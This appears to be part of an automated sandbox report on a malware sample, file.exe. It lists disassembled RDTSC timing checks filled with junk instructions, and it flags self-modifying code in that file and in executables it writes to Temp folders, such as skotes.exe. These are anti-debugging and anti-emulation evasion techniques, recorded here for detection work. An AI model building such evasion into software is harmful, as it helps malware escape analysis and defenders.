Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300336 second address: 530039A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F620450A751h 0x00000009 sub eax, 4097CA46h 0x0000000f jmp 00007F620450A751h 0x00000014 popfd 0x00000015 mov ebx, ecx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000021 jmp 00007F620450A74Ah 0x00000026 je 00007F62761289F8h 0x0000002c pushad 0x0000002d push ecx 0x0000002e push edx 0x0000002f pop esi 0x00000030 pop ebx 0x00000031 mov cx, 7DF5h 0x00000035 popad 0x00000036 mov edx, dword ptr [esi+44h] 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F620450A74Ah 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 530039A second address: 53003A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE647Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53003A9 second address: 53003E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A759h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F620450A74Eh 0x00000011 test edx, 61000000h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a movsx edi, ax 0x0000001d mov di, cx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53003E7 second address: 53003F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6204BE647Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53003F9 second address: 5300413 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F62761289CDh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F620450A74Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300413 second address: 5300419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300419 second address: 5300460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [esi+48h], 00000001h 0x0000000c jmp 00007F620450A759h 0x00000011 jne 00007F62761289A9h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F620450A758h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300460 second address: 530046F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE647Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 530046F second address: 5300475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F07BF second address: 52F0819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 800Ch 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b popad 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f movzx eax, di 0x00000012 mov ecx, edi 0x00000014 popad 0x00000015 and esp, FFFFFFF8h 0x00000018 jmp 00007F6204BE6483h 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F6204BE6486h 0x00000023 push eax 0x00000024 jmp 00007F6204BE647Bh 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov edi, 4E78A1A6h 0x00000032 push ebx 0x00000033 pop ecx 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0819 second address: 52F082C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F620450A74Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F082C second address: 52F08A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE6489h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d mov cl, CFh 0x0000000f movsx edx, si 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F6204BE6481h 0x0000001b jmp 00007F6204BE647Bh 0x00000020 popfd 0x00000021 jmp 00007F6204BE6488h 0x00000026 popad 0x00000027 xchg eax, esi 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F6204BE6487h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F08A6 second address: 52F0950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A759h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007F620450A74Eh 0x00000011 sub ebx, ebx 0x00000013 pushad 0x00000014 movsx ebx, cx 0x00000017 pushfd 0x00000018 jmp 00007F620450A758h 0x0000001d jmp 00007F620450A755h 0x00000022 popfd 0x00000023 popad 0x00000024 test esi, esi 0x00000026 jmp 00007F620450A74Eh 0x0000002b je 00007F62761301BAh 0x00000031 jmp 00007F620450A750h 0x00000036 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F620450A757h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0A92 second address: 52F0A98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0A98 second address: 52F0B2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A74Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov dl, 16h 0x0000000f movzx esi, bx 0x00000012 popad 0x00000013 xchg eax, ebx 0x00000014 jmp 00007F620450A753h 0x00000019 xchg eax, ebx 0x0000001a jmp 00007F620450A756h 0x0000001f push eax 0x00000020 pushad 0x00000021 mov si, di 0x00000024 jmp 00007F620450A74Dh 0x00000029 popad 0x0000002a xchg eax, ebx 0x0000002b pushad 0x0000002c push eax 0x0000002d pushfd 0x0000002e jmp 00007F620450A753h 0x00000033 xor ax, 8AFEh 0x00000038 jmp 00007F620450A759h 0x0000003d popfd 0x0000003e pop eax 0x0000003f push eax 0x00000040 push edx 0x00000041 mov cx, di 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0B2F second address: 52F0B57 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push dword ptr [ebp+14h] 0x0000000a jmp 00007F6204BE6485h 0x0000000f push dword ptr [ebp+10h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0B57 second address: 52F0B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0B5B second address: 52F0B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0B5F second address: 52F0B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300D67 second address: 5300DB5 instructions: 0x00000000 rdtsc 0x00000002 mov bl, cl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F6204BE6485h 0x0000000c sbb ecx, 20C2FE66h 0x00000012 jmp 00007F6204BE6481h 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b movsx ebx, si 0x0000001e mov ah, 61h 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F6204BE647Eh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300A94 second address: 5300AD0 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F620450A74Fh 0x00000008 adc esi, 11CE5E1Eh 0x0000000e jmp 00007F620450A759h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ch, F1h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300AD0 second address: 5300B28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6204BE6481h 0x00000009 jmp 00007F6204BE647Bh 0x0000000e popfd 0x0000000f mov ebx, ecx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F6204BE6480h 0x0000001c sbb cx, F5A8h 0x00000021 jmp 00007F6204BE647Bh 0x00000026 popfd 0x00000027 mov esi, 6DDD749Fh 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300B28 second address: 5300B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300B2C second address: 5300B43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE6483h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300B43 second address: 5300B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300B49 second address: 5300B4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380751 second address: 53807F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov ax, D63Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F620450A752h 0x00000013 push eax 0x00000014 jmp 00007F620450A74Bh 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b mov edi, ecx 0x0000001d push eax 0x0000001e mov eax, edx 0x00000020 pop ebx 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F620450A754h 0x0000002b sub esi, 01E0C0B8h 0x00000031 jmp 00007F620450A74Bh 0x00000036 popfd 0x00000037 push ecx 0x00000038 push ebx 0x00000039 pop ecx 0x0000003a pop edx 0x0000003b popad 0x0000003c pop ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 jmp 00007F620450A753h 0x00000045 pushfd 0x00000046 jmp 00007F620450A758h 0x0000004b xor ch, 00000078h 0x0000004e jmp 00007F620450A74Bh 0x00000053 popfd 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 537054E second address: 5370554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370554 second address: 5370558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370558 second address: 5370570 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE647Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370570 second address: 53705A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 mov ch, 9Dh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F620450A752h 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 pushad 0x00000015 mov bx, si 0x00000018 movzx ecx, bx 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e mov edx, 1B7AFA86h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53705A0 second address: 53705C1 instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6204BE6485h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53705C1 second address: 53705DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A751h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53705DD second address: 53705E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53705E1 second address: 53705E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53705E5 second address: 53705EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53705EB second address: 53705F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53703BA second address: 53703DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE6481h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6204BE647Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53703DF second address: 537040D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A751h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F620450A751h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 537040D second address: 5370411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370411 second address: 5370417 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370417 second address: 537041D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 537041D second address: 5370430 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edx, cx 0x00000010 mov edx, ecx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53100CF second address: 531011E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6204BE647Fh 0x00000009 or cx, F70Eh 0x0000000e jmp 00007F6204BE6489h 0x00000013 popfd 0x00000014 movzx esi, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6204BE6482h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531011E second address: 5310122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310122 second address: 5310128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310128 second address: 5310163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007F620450A758h 0x0000000b adc ax, 7318h 0x00000010 jmp 00007F620450A74Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310163 second address: 5310167 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310167 second address: 531016D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531016D second address: 5310194 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE647Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F6204BE6480h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ecx, ebx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53707C6 second address: 5370870 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F620450A750h 0x00000008 or ah, 00000038h 0x0000000b jmp 00007F620450A74Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F620450A756h 0x0000001a push eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F620450A751h 0x00000022 or ax, 1086h 0x00000027 jmp 00007F620450A751h 0x0000002c popfd 0x0000002d mov si, D637h 0x00000031 popad 0x00000032 xchg eax, ebp 0x00000033 pushad 0x00000034 jmp 00007F620450A758h 0x00000039 push eax 0x0000003a push edx 0x0000003b pushfd 0x0000003c jmp 00007F620450A750h 0x00000041 add ax, 4D88h 0x00000046 jmp 00007F620450A74Bh 0x0000004b popfd 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370870 second address: 53708B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE6488h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 mov bx, 4A7Eh 0x00000014 popad 0x00000015 push dword ptr [ebp+0Ch] 0x00000018 pushad 0x00000019 mov dh, 2Bh 0x0000001b popad 0x0000001c push dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F6204BE6484h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370992 second address: 5370A0B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F620450A74Eh 0x00000008 adc si, 3BB8h 0x0000000d jmp 00007F620450A74Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jmp 00007F620450A758h 0x0000001a popad 0x0000001b movzx eax, al 0x0000001e pushad 0x0000001f jmp 00007F620450A74Eh 0x00000024 pushfd 0x00000025 jmp 00007F620450A752h 0x0000002a add cx, 6078h 0x0000002f jmp 00007F620450A74Bh 0x00000034 popfd 0x00000035 popad 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370A0B second address: 5370A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370A11 second address: 5370A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEAA70 second address: AEAA76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEAA76 second address: AEAA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEAA7A second address: AEAA8A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEAA8A second address: AEAA8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEAA8F second address: AEAA95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEAA95 second address: AEAA99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEACDF second address: AEACE9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6204BE6476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5320418 second address: 5320487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F620450A757h 0x0000000b sbb ax, 118Eh 0x00000010 jmp 00007F620450A759h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F620450A74Eh 0x0000001f push eax 0x00000020 jmp 00007F620450A74Bh 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F620450A750h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5320487 second address: 532048B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 532048B second address: 5320491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 92EBB5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 92EA9D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 92EAFA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B664B1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: B8EBB5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: B8EA9D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: B8EAFA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: DC64B1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Special instruction interceptor: First address: 8FEC20 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Special instruction interceptor: First address: AADD50 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Special instruction interceptor: First address: B314F2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Special instruction interceptor: First address: DFDAB9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Special instruction interceptor: First address: F9DCA3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Special instruction interceptor: First address: F9E05E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Special instruction interceptor: First address: F9C734 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Special instruction interceptor: First address: DFB172 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Special instruction interceptor: First address: FC5A72 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Special instruction interceptor: First address: FB0E24 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Special instruction interceptor: First address: 102859B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Special instruction interceptor: First address: A4D891 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Special instruction interceptor: First address: A4D953 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Special instruction interceptor: First address: BEDF5A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Special instruction interceptor: First address: A4B17A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Special instruction interceptor: First address: C14ED4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Special instruction interceptor: First address: BF79C0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Special instruction interceptor: First address: 5F1DAB9 instructions caused by: Self-modifying code
